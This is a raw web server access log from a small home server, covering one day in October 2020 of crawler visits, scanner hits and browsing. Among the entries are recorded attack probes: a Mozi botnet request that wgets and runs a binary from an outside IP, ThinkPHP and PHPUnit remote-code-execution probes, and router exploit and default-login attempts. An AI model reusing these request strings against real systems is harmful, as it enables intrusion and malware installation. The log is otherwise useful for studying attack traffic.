Fri Oct 16 06:25:35 MDT 2020 06:25:35 up 3 days, 10:51, 1 user, load average: 3.29, 2.60, 2.39 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Mon19 3days 14:03 1.01s /usr/bin/lxsession -s LXDE-pi -e LXDE 88.5.123.76 - - [16/Oct/2020:13:21:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 23.90.145.56 - - [16/Oct/2020:13:28:40 +0000] "GET / HTTP/1.0" 200 25000 "" "" 23.90.145.56 - - [16/Oct/2020:13:29:14 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 116.72.84.240 - - [16/Oct/2020:13:41:41 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 62.24.109.23 - - [16/Oct/2020:13:46:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 95.123.41.94 - - [16/Oct/2020:13:48:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 162.243.128.57 - - [16/Oct/2020:14:04:51 +0000] "GET /manager/text/list HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 213.202.223.223 - - [16/Oct/2020:14:17:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 192.241.217.42 - - [16/Oct/2020:15:23:23 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 109.94.122.134 - - [16/Oct/2020:15:25:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 66.249.69.236 - - [16/Oct/2020:15:58:33 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/sterling.webiness.com/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 92.118.161.13 - - [16/Oct/2020:15:58:47 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 163.172.66.130 - - [16/Oct/2020:16:03:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 114.122.105.240 - - [16/Oct/2020:16:14:16 +0000] "GET /ac0xl/logs/2020.08.05 HTTP/1.1" 200 163235 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.81 Mobile Safari/537.36" 114.122.105.240 - - [16/Oct/2020:16:15:16 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 114.122.105.240 - - [16/Oct/2020:16:17:27 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/ac0xl/logs/2020.08.05" "Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.81 Mobile Safari/537.36" 114.122.105.240 - - [16/Oct/2020:16:18:28 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 114.122.105.240 - - [16/Oct/2020:16:28:38 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.81 Mobile Safari/537.36" 114.122.105.240 - - [16/Oct/2020:16:29:06 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 114.122.105.240 - - [16/Oct/2020:16:29:41 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 110.235.248.231 - - [16/Oct/2020:16:33:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 111.225.148.120 - - [16/Oct/2020:16:35:26 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)" 111.225.149.80 - - [16/Oct/2020:16:35:50 +0000] "GET /ac0xl/www/slackbook/security-depth:6 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)" 162.250.19.7 - - [16/Oct/2020:17:21:36 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:17:21:38 +0000] "GET /documents/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:17:21:55 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:17:22:06 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:17:22:38 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:17:22:44 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:17:22:53 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:17:23:11 +0000] "GET /ac0xl/logs/2020.10.16 HTTP/1.1" 200 562431 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:17:24:48 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:17:28:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:17:28:17 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:17:28:21 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:17:28:49 +0000] "GET /freedom/2020-01-08-freedom.txt HTTP/1.1" 200 2533 "http://162.250.19.7/freedom/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 219.248.190.234 - - [16/Oct/2020:17:46:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 162.250.19.7 - - [16/Oct/2020:17:49:31 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:17:54:57 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.249.69.238 - - [16/Oct/2020:18:19:30 +0000] "GET /ac0xl/Dont-Be-Evil/Partisanship/Dr.%20Myosha%20McAfee%20_%20LinkedIn.pdf HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.69.238 - - [16/Oct/2020:18:19:30 +0000] "GET /ac0xl/Dont-Be-Evil/Partisanship/Dr.%20Myosha%20McAfee%20_%20LinkedIn.pdf HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 162.250.19.7 - - [16/Oct/2020:18:31:39 +0000] "GET /freedom/freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/freedom/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 114.32.232.205 - - [16/Oct/2020:18:49:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 162.250.19.7 - - [16/Oct/2020:20:05:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:20:05:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:20:05:43 +0000] "GET /freedom/freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/freedom/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:20:06:08 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:20:06:35 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:20:06:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:20:07:10 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:20:08:17 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 104.226.3.194 - - [16/Oct/2020:20:18:14 +0000] "GET /ac0xl/logs/2020.07.18 HTTP/1.1" 200 32284 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0" 104.226.3.194 - - [16/Oct/2020:20:18:15 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/ac0xl/logs/2020.07.18" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0" 162.250.19.7 - - [16/Oct/2020:20:18:45 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:20:18:50 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:20:19:16 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:20:19:36 +0000] "GET /freedom/freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/freedom/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:20:19:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:20:20:06 +0000] "GET /freedom/freedom.zip HTTP/1.1" 200 76153 "http://162.250.19.7/freedom/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:20:20:34 +0000] "GET /freedom/freedom-2020-10-16/ HTTP/1.1" 200 25000 "http://162.250.19.7/freedom/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:20:21:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:20:22:17 +0000] "GET /freedom/2020-10-16-freedom.txt HTTP/1.1" 200 5381 "http://162.250.19.7/freedom/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:20:23:14 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:21:01:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:21:02:05 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:21:06:20 +0000] "GET /downloads/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:21:06:27 +0000] "GET /downloads/MMSforum.io/ HTTP/1.1" 200 25000 "http://162.250.19.7/downloads/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:21:06:32 +0000] "GET /downloads/MMSforum.io/protocol-115_for_viruses-1.pdf HTTP/1.1" 403 0 "http://162.250.19.7/downloads/MMSforum.io/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:21:08:29 +0000] "GET /downloads/MMSforum.io/protocol-115_for_viruses-1.pdf HTTP/1.1" 403 0 "http://162.250.19.7/downloads/MMSforum.io/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:21:08:34 +0000] "GET /downloads/MMSforum.io/protocol-115_for_viruses-1.pdf HTTP/1.1" 403 0 "http://162.250.19.7/downloads/MMSforum.io/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:21:08:43 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [16/Oct/2020:21:08:45 +0000] "GET /downloads/MMSforum.io/protocol-115_for_viruses-1.pdf HTTP/1.1" 403 0 "http://162.250.19.7/downloads/MMSforum.io/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:21:09:38 +0000] "GET /downloads/MMSforum.io/protocol-115_for_viruses-1.pdf HTTP/1.1" 200 408215 "http://162.250.19.7/downloads/MMSforum.io/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [16/Oct/2020:21:09:43 +0000] "GET /downloads/MMSforum.io/protocol-115_for_viruses-1.pdf HTTP/1.1" 200 924502 "" "Dalvik/1.6.0 (Linux; U; Android 4.4.2; ALCATEL ONE TOUCH 4037T Build/KOT49H)" 156.96.157.238 - - [16/Oct/2020:22:15:48 +0000] "GET / HTTP/1.1" 200 25000 "" "" 122.116.36.239 - - [16/Oct/2020:22:23:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 128.199.144.152 - - [16/Oct/2020:23:00:39 +0000] "GET / HTTP/1.1" 200 25000 "" "" 185.198.0.169 - - [16/Oct/2020:23:34:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 112.237.13.14 - - [16/Oct/2020:23:54:10 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 0 "" "Hello, World" 185.165.151.1 - - [16/Oct/2020:23:59:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 124.118.65.178 - - [17/Oct/2020:00:17:38 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://172.45.62.138:34824/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 0 "" "Hello, world" 66.249.69.240 - - [17/Oct/2020:00:31:41 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/sterling.webiness.com/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.69.238 - - [17/Oct/2020:01:22:23 +0000] "GET /ac0xl/www/slackbook/essential-sysadmin-shutdown.html HTTP/1.1" 200 10340 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 114.34.245.30 - - [17/Oct/2020:01:22:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 221.120.37.190 - - [17/Oct/2020:01:38:22 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 115.61.175.211 - - [17/Oct/2020:01:52:36 +0000] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 0 "" "" 66.249.69.240 - - [17/Oct/2020:02:17:01 +0000] "GET /ads.txt HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 222.186.136.150 - - [17/Oct/2020:02:48:19 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 46.100.230.196 - - [17/Oct/2020:03:09:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 58.7.138.206 - - [17/Oct/2020:03:24:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 47.111.19.40 - - [17/Oct/2020:04:08:05 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.149.192.68 - - [17/Oct/2020:04:19:59 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 193.27.228.27 - - [17/Oct/2020:04:23:37 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.27.228.27 - - [17/Oct/2020:04:23:47 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.27.228.27 - - [17/Oct/2020:04:30:15 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.27.228.27 - - [17/Oct/2020:04:37:52 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.27.228.27 - - [17/Oct/2020:04:41:53 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 66.249.64.69 - - [17/Oct/2020:04:53:41 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.64.71 - - [17/Oct/2020:04:53:41 +0000] "GET /ac0xl/logs/2020.07.10 HTTP/1.1" 200 41259 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 114.119.130.3 - - [17/Oct/2020:05:18:57 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "(compatible;PetalBot;+https://aspiegel.com/petalbot)" 220.135.147.179 - - [17/Oct/2020:05:20:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 186.183.165.74 - - [17/Oct/2020:05:44:59 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 193.27.228.27 - - [17/Oct/2020:06:00:41 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 205.185.113.195 - - [17/Oct/2020:06:15:45 +0000] "POST /tmUnblock.cgi HTTP/1.1" 404 0 "" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.el6.x86_64" 205.185.113.195 - - [17/Oct/2020:06:15:46 +0000] "GET /tmUnblock.cgi HTTP/1.1" 404 0 "" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.el6.x86_64" 54.36.148.193 - - [17/Oct/2020:06:21:50 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)" 185.99.65.252 - - [17/Oct/2020:07:03:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 183.136.225.56 - - [17/Oct/2020:07:15:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Baiduspider+(+http://www.baidu.com/search/spider.htm);googlebot|baiduspider|baidu|spider|sogou|bingbot|bot|yahoo|soso|sosospider|360spider|youdaobot|jikeSpider;)" 83.97.20.21 - - [17/Oct/2020:08:37:53 +0000] "GET / HTTP/1.0" 200 25000 "" "" 193.27.228.27 - - [17/Oct/2020:09:13:54 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 162.250.19.7 - - [17/Oct/2020:09:26:34 +0000] "GET /downloads/MMSforum.io/protocol-115_for_viruses-1.pdf HTTP/1.1" 200 654899 "http://162.250.19.7/downloads/MMSforum.io/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [17/Oct/2020:09:28:08 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [17/Oct/2020:09:28:26 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [17/Oct/2020:09:28:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [17/Oct/2020:09:28:51 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 71.6.232.2 - - [17/Oct/2020:09:33:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" 90.94.148.165 - - [17/Oct/2020:09:41:18 +0000] "GET /ac0xl/logs/2019.11.24 HTTP/1.1" 200 49216 "https://www.google.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 90.94.148.165 - - [17/Oct/2020:09:41:19 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 66.249.64.71 - - [17/Oct/2020:09:44:32 +0000] "GET /ac0xl/logs/2020.06.20 HTTP/1.1" 200 10962 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 179.110.141.120 - - [17/Oct/2020:09:54:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 193.27.228.27 - - [17/Oct/2020:10:04:16 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 200.25.135.148 - - [17/Oct/2020:10:06:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 66.240.205.34 - - [17/Oct/2020:10:23:22 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.128.50 - - [17/Oct/2020:10:42:46 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 131.228.48.69 - - [17/Oct/2020:10:42:53 +0000] "GET /ac0xl/logs/2020.09.04 HTTP/1.1" 200 449708 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" 131.228.48.69 - - [17/Oct/2020:10:42:54 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" 131.228.48.69 - - [17/Oct/2020:10:43:00 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 173.245.206.169 - - [17/Oct/2020:10:43:49 +0000] "GET /ac0xl/Dont-Be-Evil/Leadership%20Training/Attorney-Client%20Privileged_%20Cloud%20DEI%202018%20Planning.pdf HTTP/1.1" 200 243209 "" "curl/7.54.0" 156.96.128.142 - - [17/Oct/2020:11:35:12 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/6.49" 66.249.64.71 - - [17/Oct/2020:11:54:43 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/sterling.webiness.com/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 162.142.125.49 - - [17/Oct/2020:12:00:27 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 162.142.125.49 - - [17/Oct/2020:12:00:28 +0000] "GET / HTTP/1.1" 200 25000 "" "" 162.142.125.49 - - [17/Oct/2020:12:00:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" Sat Oct 17 06:25:37 MDT 2020 06:25:38 up 3:02, 1 user, load average: 3.09, 2.50, 2.19 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 03:23 3:08m 34.44s 0.37s /usr/bin/lxsession -s LXDE-pi -e LXDE